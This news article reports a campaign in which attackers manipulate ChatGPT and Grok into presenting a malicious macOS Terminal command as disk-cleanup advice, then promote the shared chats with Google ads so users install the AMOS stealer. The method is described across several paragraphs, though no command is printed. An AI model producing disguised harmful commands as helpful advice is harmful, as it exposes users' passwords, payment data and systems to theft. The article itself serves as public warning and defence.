Hackers Use ChatGPT to Trick Mac Users Into Installing Stealer Malware

Hackers Use ChatGPT to Trick Mac Users Into Installing Stealer Malware - Professional coverage

According to 9to5Mac, cybersecurity firm Huntress has documented a new attack where hackers are using ChatGPT and X’s Grok chatbot to trick Mac users into installing malware. The attackers created public conversations with the AI assistants that included a malicious Terminal command disguised as a “safe system cleanup” instruction for freeing up disk space. They then paid Google to promote these chat links, ensuring they appeared at the top of search results for queries like “Clear disk space on macOS.” An unsuspecting user clicked the ChatGPT link, followed the seemingly polite, step-by-step guidance, and executed the command. This action downloaded a variant of the “AMOS” stealer malware, which immediately harvested passwords, escalated system privileges to root, and deployed persistent malware. The same method was successfully deployed using a Grok conversation, showing this is a reproducible exploit of AI platforms.

Special Offer Banner

How the scam works

Here’s the thing: this is old-school social engineering with a terrifyingly modern twist. The hackers aren’t breaking into systems. They’re politely asking the victim to open the door for them. They start by having a conversation with ChatGPT or Grok, carefully crafting a prompt that gets the AI to present a dangerous Terminal command as helpful advice. Then, they make that chat public and buy a Google ad for the link. So when a frustrated user Googles a common problem—like how to free up space—they see what looks like a legitimate, authoritative result from ChatGPT itself at the very top of the page. The user trusts Google’s ranking and OpenAI’s or X’s brand. They click, see a normal-looking AI chat, and copy-paste the command. And just like that, they’ve bypassed every single macOS security gate because they manually executed the command themselves. It’s a brutal exploitation of trust in the entire tech stack: the search engine, the AI brand, and the user’s own desire for a quick fix.

Why this is so dangerous

This method is insidious because it weaponizes help. People turn to Google and AI for troubleshooting all the time. The instructions looked friendly and legitimate, hosted on the actual chat.openai.com domain. There’s no sketchy download link, no fake website. It’s just text in a chat window. For a non-technical user, how are they supposed to know the difference between a safe `sudo` command and a malicious one? They can’t. And that’s the point. The malware installed, MacStealer (or AMOS), is no joke. It grabs iCloud passwords, credit card details from browsers, and files. It gets root access, meaning it owns the system, and it sticks around. All from one copied line of text. It makes you wonder, what other “helpful” AI guides out there are actually traps?

The broader trend and what to do

Sam Chapman at Engadget notes this is part of a growing trend of using AI to refine classic scams. Hackers are using AI to brainstorm better phishing lures, write more convincing copy, and now, to poison the very well of common knowledge—search results. So what’s the fix? The immediate lesson is painfully simple: never, ever paste a Terminal command you don’t fully understand. Sponsored results, even for trusted brands, are not a safe source. If you need tech help, go directly to official support documentation. But the bigger issue is for the platforms. Google, OpenAI, and X need to figure out how to police their public chats and sponsored links for this kind of weaponized content. Because right now, their systems are being used as the perfect delivery mechanism for malware. In the meantime, tell your less-techy friends and family. A quick warning could save them a world of trouble. It’s a reminder that in tech, as in life, if something seems too easy, it probably is.

Leave a Reply

Your email address will not be published. Required fields are marked *